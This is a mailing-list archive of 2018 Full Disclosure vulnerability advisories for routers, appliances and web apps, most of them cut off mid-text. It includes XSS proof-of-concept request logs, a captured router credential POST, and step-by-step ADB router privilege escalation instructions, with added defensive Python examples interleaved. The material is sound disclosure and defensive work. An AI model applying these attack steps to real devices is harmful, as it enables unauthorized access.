[FD] Lenovo SU v5.07 - Buffer Overflow & Arbitrary Code Execution Vulnerability

2018-07-12 Thread Vulnerability Lab
File flags:   0 (Mask 3F)
File OS:  4 Unknown Win32
File type:1.0 App
File date:.
Translations: 0409.04b0
ProductName:  Map Network Drive
InternalName: mapdrv
OriginalFilename: mapdrv.exe
ProductVersion:   1, 0, 0, 1
FileVersion:  1, 0, 0, 1
FileDescription:  Map Network Drive Application
LegalCopyright:   Copyright Lenovo 2005, 2006, all rights reserved.
Copyright IBM Corporation 1996-2005, all rights reserved.


Solution - Fix & Patch:
===
Update Lenovo System Update to version 5.07.0072 or later. You can
determine the currently installed version by
opening Lenovo System Update, clicking on the green question mark in the
top right corner and then selecting “About.”

Lenovo System Update can be updated by choosing either of the following
methods:

Lenovo System Update automatically checks for a later version whenever
the application is run.
Click OK when prompted that a new version is available.
To manually update, download the latest version from the following URL:
https://support.lenovo.com/en/documents/ht080136


Security Risk:
==
The security risk of the buffer overflow and arbitrary code execution
vulnerability is estimated as high.


Credits & Authors:
==
S.AbenMassaoud (Vulnerability Laboratory Core Research Team) -
https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] AT&T Bizcircle - Persistent Profile Cross Site Scripting Vulnerabilities

2018-07-11 Thread Vulnerability Lab
tus: 200[OK]
GET
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/evil.source/

Mime Type[text/html]
   Request Header:
  Host[bizcircle.att.com]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0)
Gecko/20100101 Firefox/54.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

Referer[https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/]
  Cookie[PHPSESSID=l18mlg2dueco0q3h6kb131eub7;
AMCV_55633F7A534535110A490D44%40AdobeOrg=2096510701%7CM
CIDTS%7C17396%7CMCMID%7C26100431646396483062447545331633367848%7CMCAAMLH-1503573649%7C6%7CMCAAMB-1503573649
%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1502976049s%7CNONE%7CMCAID%7CNONE%7CMCSYNCSOP%7C411-17403%7CvVersion%7C2.0.0;

mbox=session#1502968849133-685067#1502970967|PC#1502968849133-685067.26_19#1504178707;
AMCVS_55633F7A534535110
A490D44%40AdobeOrg=1; _ga=GA1.2.774089946.1502968850;
_gid=GA1.2.1647846308.1502968850;
s_cc=true; bp-activity-oldestpage=1;
aam_uuid=26195646366965627042419912699465776394;
Successful Registration=true; TLTSID=DFFB796CF9727EB3DAD892F1CE4732DB;
fsr.s={"v2":1,"v1":1,"rid":"d036702-53861434-b5e4-2910-b41f2",
"cp":{"ufix":"no","ug":"n","platform":"mSite","WLS_TSR":"no"},"to":4.5,"pv":6,"f":1502969105924};
wordpress_logged_in_cae26c4a20b3aee9c355ac89848c9a6c=att1759500603%7C1503141687%7C5r0gGlSD0k4TLZ8DdczeF
GgpYJrrbeqwy9p8pvslaMr%7Cab6915c095b9e9a27373469d6f4cae49510879dab933281d16868d1cf4bd524a;
_gat=1]
  Connection[keep-alive]
   Response Header:
  Server[Apache]
  X-Frame-Options[SAMEORIGIN]
  Cache-Control[no-cache, must-revalidate, max-age=0]
  X-UA-Compatible[IE=edge]
  Content-Type[text/html; charset=UTF-8]
  Vary[Accept-Encoding]
  Content-Encoding[gzip]
  Content-Length[19404]
  Connection[keep-alive]


Reference(s):
https://bizcircle.att.com/
https://bizcircle.att.com/members/
https://bizcircle.att.com/members/att1759500603/
https://bizcircle.att.com/members/att1759500603/profile/
https://bizcircle.att.com/members/att1759500603/profile/edit/
https://bizcircle.att.com/members/att1759500603/profile/edit/group/
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/


Solution - Fix & Patch:
=======
The vulnerability has been patched by the AT&T Biz Circle developer team.
The issue was handled as part of the official AT&T bug bounty program.


Security Risk:
==
The security risk of the persistent cross-site scripting vulnerability in the
web application is estimated as medium (CVSS 4.6).


Credits & Authors:
==
Benjamin K.M. [Vulnerability Laboratory Core Research Team] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of
business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability mainly for incidental or
consequential damages so the foregoing limitation may not apply. We do not
approve or encourage anybody to break any licenses, policies, deface websites,
hack into databases or trade with stolen data. We have no need for criminal
activities or membership requests. We do not publish advisories or
vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher
groups or individuals. We do not publish trade researcher mails, phone numbers,
conversations or anything else to journalists, investigative authorities or
private individuals.

Domains:    www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Tea

[FD] Barracuda ADC 5.x - Client Side Cross Site Scripting Vulnerability

2018-07-11 Thread Vulnerability Lab
cal&content_only=1&group=evil.source[NON-PERSISTENT
INJECTED SCRIPT CODE
PAYLOAD!]%3Ecross-site-scripting&locale=de_DE&new_secondary_tab=view_internal_patterns&primary_tab=SECURITY&realm=&secondary_tab=copy_internal_attack_patterns&user=guest&ispopup=1&parent_name=libraries496409&popup_width=725&popup_height=500]
  Cookie[_ga=GA1.2.608616028.1422207688;
_ga=GA1.2.608616028.1422207688; _gat=1]
  Connection[keep-alive]
   Response Header:
  Server[BarracudaHTTP 4.0]
  Content-Type[text/html]
  Content-Length[1949]
  Connection[close]
-
Status: 500[Internal Server Error]
GET http://adc.localhost:8080/cgi-mod/evil.source[CLIENT SIDE SCRIPT
CODE EXECUTION!]
Mime Type[text/html]
   Request Header:
  Host[adc.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0)
Gecko/20100101 Firefox/35.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]

Referer[http://adc.localhost:8080/cgi-mod/index.cgi?password=48c669c1112b5fd89648930d335f0d8b&et=141302&auth_type=Local&content_only=1&group=evil.source[NON-PERSISTENT
INJECTED SCRIPT CODE
PAYLOAD!]%3Ecross-site-scripting&locale=de_DE&new_secondary_tab=view_internal_patterns&primary_tab=SECURITY&realm=&secondary_tab=copy_internal_attack_patterns&user=guest&ispopup=1&parent_name=libraries496409&popup_width=725&popup_height=500]
  Cookie[_ga=GA1.2.608616028.1422207688;
_ga=GA1.2.608616028.1422207688; _gat=1]
  Connection[keep-alive]
   Response Header:
  Server[BarracudaHTTP 4.0]
  Content-Type[text/html]
  Content-Length[1949]
  Connection[close]


Reference(s):
http://adc.localhost:8080/
http://adc.localhost:8080/cgi-mod/
http://adc.localhost:8080/cgi-mod/index.cgi
http://adc.localhost:8080/cgi-mod/index.cgi?password=
http://adc.localhost:8080/cgi-mod/index.cgi?password=x&et=x
http://adc.localhost:8080/cgi-mod/index.cgi?password=x&et=x&auth_type=Local
http://adc.localhost:8080/cgi-mod/index.cgi?password=x&et=x&auth_type=Local&content_only=
http://adc.localhost:8080/cgi-mod/index.cgi?password=x&et=x&auth_type=Local&content_only=1&group=


Solution - Fix & Patch:
===
The vulnerability can be patched by parsing and encoding the vulnerable
`group` parameter value of the copy (kopieren) module GET request before it
is reflected into the response.
Restrict the input and disallow special characters to prevent client-side
script code injection.
Implement secure exception handling so that error responses (such as the
500 page shown above) do not reflect unencoded request data either.

Note: The issue was reported in 2016 Q4 (2016-10-01) and was finally
resolved in 2017 Q3 - Q4 by the Barracuda Networks developer team across
all appliance series.
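The following Python is an added example of the two-sided fix described above; it is not Barracuda's code and not part of the advisory. It shows the vulnerable reflection of the `group` value next to the hardened version (HTML-encode for the text context, percent-encode when the value goes into a URL, and an error handler that does not reflect the request raw), plus an identifier allowlist for the input side. The sample payload, the allowlist pattern and the URL path are assumptions for the example.

```python
import html
import re
from urllib.parse import quote

# Constructed sample in the shape of the advisory's "group=evil.source[...]"
# parameter; the script tag stands in for the bracketed payload marker.
INJECTED_GROUP = 'evil.source"><script>alert(1)</script>'

# Assumed allowlist for attack-pattern group names (identifier-like); this is
# the example's own rule, not the appliance's.
GROUP_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def render_group_vulnerable(group: str) -> str:
    """Reflects the raw GET parameter into the page: the pattern behind the bug."""
    return f"<td>Copy attack pattern group: {group}</td>"


def render_group_hardened(group: str) -> str:
    """Encodes for the HTML text context before reflecting the value."""
    return f"<td>Copy attack pattern group: {html.escape(group, quote=True)}</td>"


def group_name_is_valid(group: str) -> bool:
    """Input restriction: only identifier characters, bounded length."""
    return GROUP_NAME_RE.fullmatch(group) is not None


def copy_module_url(group: str) -> str:
    """Percent-encodes the value when it is placed into a URL (a different
    context needs a different encoder); the path is assumed for the example."""
    return ("/cgi-mod/index.cgi?secondary_tab=copy_internal_attack_patterns"
            "&group=" + quote(group, safe=""))


def error_page_hardened(requested_path: str) -> str:
    """Exception handler that reports the failing path without reflecting it
    raw (the advisory shows the injected script running in a 500 response)."""
    return ("<html><body><h1>500 Internal Server Error</h1>"
            f"<p>Request failed: {html.escape(requested_path, quote=True)}</p>"
            "</body></html>")


def has_script_tag(markup: str) -> bool:
    """Crude check used to compare the two renderings."""
    return "<script" in markup.lower()
```

Validation and encoding are independent layers: the allowlist stops most payloads at the door, and the encoder protects any code path that still reflects a value the validator did not cover.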


Security Risk:
==
The security risk of the reflected (non-persistent) cross-site scripting
vulnerability in the Barracuda Networks ADC appliance web application is
estimated as medium (CVSS 3.6).


Credits & Authors:
==
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.



[FD] Barracuda ADC 5.x - Filter Bypass & Persistent Validation Vulnerability

2018-07-11 Thread Vulnerability Lab
  Connection[keep-alive]


Reference(s):
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/Corp_Web/content_rules/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/Corp_Web/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/


Solution - Fix & Patch:
===
The vulnerability can be patched by parsing and encoding the content rules
input field values before they are stored and rendered.
Restrict the input and disallow special characters. Filter and encode the
item listing in the configured server module so that stored payloads are
not executed.
Implement dedicated exception handling to prevent application-side script
code execution.


Security Risk:
==
The security risk of the persistent input validation (stored cross-site
scripting) vulnerability in the Barracuda Networks ADC appliance web
application is estimated as medium (CVSS 3.8).

Note: The issue was reported to the Barracuda Networks developer team in
2016 and was finally resolved in 2017 Q1 - Q4. The disclosure process took
about one year because of the vendor's patch cycle.


Credits & Authors:
==
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.






-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability

2018-07-11 Thread Vulnerability Lab
ype[text/html]
   Request Header:
  Host[event.localhost]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]
  Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
  If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]
  If-None-Match["31793159796dce1:0"]
  Cache-Control[max-age=0]
   Response Header:
  Content-Type[text/html]
  Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]
  Etag["31793159796dce1:0"]
  Connection[keep-alive]
-
Status: 200[OK]
GET http://event.localhost/nw/_ui/en/evil.source%3C/td
Mime Type[text/html]
   Request Header:
  Host[event.localhost]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]
  Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Content-Type[text/html]
  Server[Microsoft-IIS/7.5]
  X-Powered-By[ASP.NET]
  Content-Length[1245]
  Connection[keep-alive]


Reference(s):
http://event.localhost/
http://event.localhost/nw/
http://event.localhost/nw/_ui/


Solution - Fix & Patch:
===
The issue was reported in 2016 Q4 (2016-11-09) and was finally resolved in
2017 Q3 - Q4 by the ASUS WRT developer team. The public disclosure process
took about 10 months.


Security Risk:
==
The security risk of the persistent cross-site scripting web vulnerability
in the ASUS WRT UI is estimated as medium (CVSS 3.0).


Credits & Authors:
======
Lawrence Amer (Vulnerability Lab Core Research Team)
[zeroat...@gmail.com] -
https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer







[FD] Intel System CU - Buffer Overflow (Denial of Service) Vulnerability

2018-07-11 Thread Vulnerability Lab
Document Title:
===
Intel System CU - Buffer Overflow (Denial of Service) Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2133

Security ID: INTEL-SA-00134

https://nvd.nist.gov/vuln/detail/CVE-2018-3661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3661

Acknowledgements:
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00134.html

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3661

CVE-ID:
===
CVE-2018-3661


Release Date:
=
2018-07-11


Vulnerability Laboratory ID (VL-ID):

2133


Common Vulnerability Scoring System:

5.5


Vulnerability Class:

Buffer Overflow


Current Estimated Price:

3.000€ - 4.000€


Abstract Advisory Information:
==
The Vulnerability Laboratory core research team discovered a local buffer
overflow vulnerability in the official Intel System CU (system configuration
utilities) 14.0 and 14.1.


Vulnerability Disclosure Timeline:
==
2018-05-15: Release Date (Intel)
2018-07-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Intel Systems
Product: Intel System - CU (Utilities) 14.0 build & 14.1 build - (Intel®
C620 Series Chipsets b19)


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Bug Bounty Program


Technical Details & Description:

A local buffer overflow vulnerability has been discovered in the official
Intel System CU 14.0 and 14.1 utilities. A local attacker can exploit it by
supplying crafted input that overflows a buffer and overwrites active
registers, crashing the utility process or the affected computer system.

The Intel system configuration utilities are vulnerable to a denial of
service caused by a classic buffer overflow. By passing specially crafted
input, a local authenticated attacker can trigger a denial of service
condition.

Affected are versions of syscfg.exe before release 14.0 build 16 or, for
systems based on Intel® C620 Series Chipsets, before 14.1 build 19. Affected
are versions of selview.exe before release 14.0 build 21 or, for systems
based on Intel® C620 Series Chipsets, before 14.0 build 11.

Exploitation of the local buffer overflow vulnerability requires local
access with user privileges and no further user interaction. Successful
exploitation results in a denial of service against the local utility
process or the affected computer system.

Vulnerable File(s):
[+] syscfg.exe
[+] selview.exe

Vulnerable File(s):
[+] syscfg.exe
[+] selview.exe


https://www.vulnerability-lab.com/resources/pictures/2133/Intel1.jpg
https://www.vulnerability-lab.com/resources/pictures/2133/Intel2.jpg


Security Risk:
==
The security risk of the exploitable local buffer overflow vulnerability
in the utilities software is estimated as medium (CVSS 5.5).


Credits & Authors:
==
S.AbenMassaoud -
https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud



[FD] Secutech DSL WR RIS 330 - Filter Bypass Vulnerability

2018-07-11 Thread Vulnerability Lab
:language=en
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

MACC=&GO=advance.asp&v12_time=1477567396.02&WANT1=3&net_type=2&PUN=Lawrence%40connecy.au&PPW=hivulnerable&wirelesspassword=7331

RESPONSE-
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://localhost/notice.asp


  This document has moved to a new <a href="http://localhost/notice.asp">location</a>.
  Please update your documents to reflect the new location.


Solution - Fix & Patch:
===
The vulnerability can be patched by restricting and validating the affected
password parameter of the POST request on the server side.
Reject any password of fewer than 8 characters before it is saved, so that
the minimum length is enforced independently of any check in the web UI,
to permanently protect customers using the mentioned hardware.
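An added example, not the router vendor's code and not from the advisory, of the server-side enforcement the fix calls for: it decodes the POST body captured above with Python's standard library and applies the length and character rules a WPA/WPA2 passphrase must meet (8 to 63 printable ASCII characters), so the 4-character value the device accepted is rejected regardless of any check in the browser. The digits-only rule is the example's own policy.

```python
from urllib.parse import parse_qs

# The POST body captured in the advisory; its 4-character wirelesspassword is
# the value the router accepted.
CAPTURED_BODY = (
    "MACC=&GO=advance.asp&v12_time=1477567396.02&WANT1=3&net_type=2"
    "&PUN=Lawrence%40connecy.au&PPW=hivulnerable&wirelesspassword=7331"
)

# WPA/WPA2 passphrases are 8 to 63 printable ASCII characters; the
# "no digits-only" rule below is this example's own policy.
WIFI_MIN_LEN = 8
WIFI_MAX_LEN = 63


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body, keeping empty fields
    such as MACC= so their presence can be checked too."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def wireless_password_errors(pw: str) -> list:
    """Rules the server must enforce itself; a browser-side check is advisory."""
    errors = []
    if len(pw) < WIFI_MIN_LEN:
        errors.append(f"wirelesspassword shorter than {WIFI_MIN_LEN} characters")
    if len(pw) > WIFI_MAX_LEN:
        errors.append(f"wirelesspassword longer than {WIFI_MAX_LEN} characters")
    if any(not (0x20 <= ord(c) <= 0x7E) for c in pw):
        errors.append("wirelesspassword contains non-printable or non-ASCII characters")
    if pw.isdigit():
        errors.append("wirelesspassword consists of digits only")
    return errors


def validate_setup_request(body: str) -> list:
    """Return the list of policy violations for a password-setup POST;
    an empty list means the request may be saved."""
    form = parse_form(body)
    pw = form.get("wirelesspassword")
    if pw is None:
        return ["wirelesspassword missing"]
    return wireless_password_errors(pw)
```

The handler that writes the configuration should call `validate_setup_request` first and answer with an error page instead of the redirect to notice.asp whenever the list is non-empty.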


Security Risk:
==
The security risk of the filter bypass vulnerability in the router's
password setup module is estimated as medium (CVSS 3.3).


Credits & Authors:
==
Lawrence Amer (Vulnerability Lab Core Research Team)
[zeroat...@gmail.com] -
https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer




[FD] SEC Consult SA-20180711-0 :: Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T

2018-07-11 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
===
  title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
 vulnerable version: FW 01 - 01.01.10(01)
  fixed version: FW 02
 CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
 impact: High
   homepage: https://www.wago.com/
  found: 2018-04-25
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"New ideas are the driving force behind our success WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."

Source: http://www.wago.us/wago/

"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY
7300T Web Panels help you reinforce the quality of your machinery and equipment
with a refined design and industry-leading software. Learn more about how the
right Web Panels make a difference.

HMI components are the finishing touch for machines or systems and they have an
overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing
HMIs that leave a lasting impression and significantly increase both the value
and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is
available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."

Source:
http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp


Business recommendation:

HMI displays are widely used in SCADA infrastructures. The link between
their administrative (or informational) web interfaces and the users who
access these interfaces is critical. The presented attacks demonstrate how
simple it is to inject malicious code that breaks the security of this link
with minimal user interaction.

As a consequence, a computer used for HMI administration should offer no
way of being compromised via malicious script code.

Possible measures include:
   * Do not allow email clients on the HMI stations
   * Do not provide Internet access at all on the HMI stations

SEC Consult recommends immediately applying the available patches from the
vendor.
A thorough security review should be performed by security professionals to
identify further potential security issues.


Vulnerability overview/description:
---
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross-site scripting vulnerabilities were identified within multiple
PHP scripts in the admin interface. The JSON input parameter sent to the
device is not sanitized sufficiently. An attacker can exploit this
vulnerability to execute arbitrary scripts in the context of the attacked user
and gain control over the active session.

This vulnerability is present for authenticated and unauthenticated users!


2) Stored Cross-Site Scripting (CVE-2018-12981)
A stored cross-site scripting vulnerability was identified within the
"PLC List" which can be configured in the web interface of the e!DISPLAY. By
storing a payload there, an administrative or guest user can be attacked
without having to trick them into visiting a malicious web site or clicking
a malicious link.

This vulnerability is only present for authenticated users!


3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check, and the
location of the uploaded file on the system can be changed by the client. As
the web service does not run as a privileged user, a file cannot be written
directly to the web root, but it can be placed in many other locations on the
file system. The normal user 'user' and the administrative user 'admin' can
both upload files to the system.
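An added example (not WAGO's code and not from the advisory) of the containment check an upload handler needs so that a client-supplied file name can neither steer the file out of the upload directory nor carry a dangerous extension. It first shows what an unchecked path join does with an absolute or `..`-laden name, then the hardened resolver. The upload root and the extension allowlist are assumptions for the example; no file is written.

```python
import posixpath
from pathlib import PurePosixPath
from typing import Optional

# Assumed upload directory and extension allowlist for the example; the
# advisory does not name the device's real upload location.
UPLOAD_ROOT = PurePosixPath("/var/www/upload")
ALLOWED_SUFFIXES = {".csv", ".png", ".txt"}


def vulnerable_target(root: PurePosixPath, user_path: str) -> str:
    """What an unchecked join does with a client-chosen path: an absolute
    name replaces the root entirely and '..' segments walk out of it."""
    return posixpath.normpath(posixpath.join(str(root), user_path))


def is_inside(root: PurePosixPath, path: str) -> bool:
    """True when the normalised path lies under root."""
    return posixpath.commonpath([str(root), path]) == str(root)


def resolve_upload_target(root: PurePosixPath, user_path: str) -> Optional[PurePosixPath]:
    """Return where an upload may be written, or None to reject it.

    Only the basename of the client-supplied name is used, hidden files and
    unexpected extensions are refused, and the joined result is checked to
    be inside root as a final guard.
    """
    name = PurePosixPath(user_path).name
    if name in ("", ".", "..") or name.startswith("."):
        return None
    if PurePosixPath(name).suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    target = root / name
    if root not in target.parents:
        return None
    return target
```

Dropping everything but the basename is deliberate: an upload feature has no reason to honour client-supplied directories, and refusing them outright is simpler to reason about than normalising and re-checking them.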


4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions a file in the web root can be overwritten
by the unprivileged 'www' user. This is the sam

[FD] SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
===
  title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13110
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-07-11
 by: Stefan Viehböck (Office Vienna)
 Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the group manipulation vulnerability on affected and unpatched
devices an attacker is able to gain access to the command line interface (CLI)
even if it was previously disabled by the ISP.

Depending on the feature set of the CLI (ISP dependent) it is then possible to
gain access to the whole configuration, manipulate settings in the web GUI
and escalate privileges to the highest access rights.

SEC Consult highly recommends a thorough security review of this platform by
security professionals. It is assumed that further critical vulnerabilities
exist within the firmware of this device.


Vulnerability overview/description:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to
gain access to the CLI (even if it has been disabled by the configuration)
and escalate privileges.

Depending on the CLI features it is possible to extract the whole configuration
and manipulate settings or gain access to debug features of the device, e.g.
via the "debug", "upgrade" or "upload" commands in the CLI.

Attackers can thereby obtain sensitive configuration data such as VoIP
credentials or other information and manipulate any setting of the device.


Proof of concept:
-
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
It is possible to manipulate the group name setting of "Storage users" and
overwrite the local linux groups called "remoteaccess" or "localaccess"
(in /etc/group) which define access to Telnet or SSH on the ADB devices.

It may be possible to overwrite the "root" group as well but it may brick the
device and the default user is already within the "root" group. Hence this
attack has not been further tested.

The following steps describe the attack:
a) Add a new group called "localaccess" via the web GUI here:
 http://$IP/ui/dboard/storage/storageusers?backto=storage

   This will generate the following new group in /etc/group. The original
   "localaccess" group will be overwritten.

   localaccess:Storage Group:5001:

b) Then delete this group via the web GUI again; the entry will be removed
   from /etc/group completely.

c) Afterwards, create the following new group name entry via the web GUI and
   add your user account (e.g. admin) wh

[FD] SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
===
  title: Authorization Bypass
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13109
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-28
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the authorization bypass vulnerability on affected and unpatched
devices an attacker is able to gain access to settings that are otherwise
forbidden for the user, e.g. through strict settings set by the ISP. It is also
